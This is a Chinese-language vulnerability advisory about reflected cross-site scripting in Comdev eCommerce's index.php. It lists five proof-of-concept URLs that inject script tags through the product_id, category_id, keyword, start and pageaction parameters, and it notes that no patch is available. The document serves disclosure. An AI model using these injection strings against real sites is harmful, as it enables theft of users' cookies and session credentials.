描述：SmOk3 of SystemSecure.org发现Comdev eCommerce中存在输入合法性漏洞，导致远程用户实现跨站脚本攻击。

'index.php'脚本中的start, category_id, keyword, pageaction 和 product_id 这几个参数对用户提交的数据验证不严。
因此，一个远程用户可以精心构造一个URL，当目标用户登陆到这个URL上时，就会在目标用户的浏览器上执行任意脚本代码。
这个代码来源于运行Comdev eCommerce软件的站点和运行在站点的安全内容上。结果是，目标用户的cookies（包括验证信息），
目标用户提交任何与站点有关的数据或者以目标用户的身份在站点上操作都会被代码获得。

提供如下测试方法：
index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=

解决方法：
目前厂商还没有提供补丁或者升级程序
厂商地址:http://www.comdevweb.com/ecommerce.php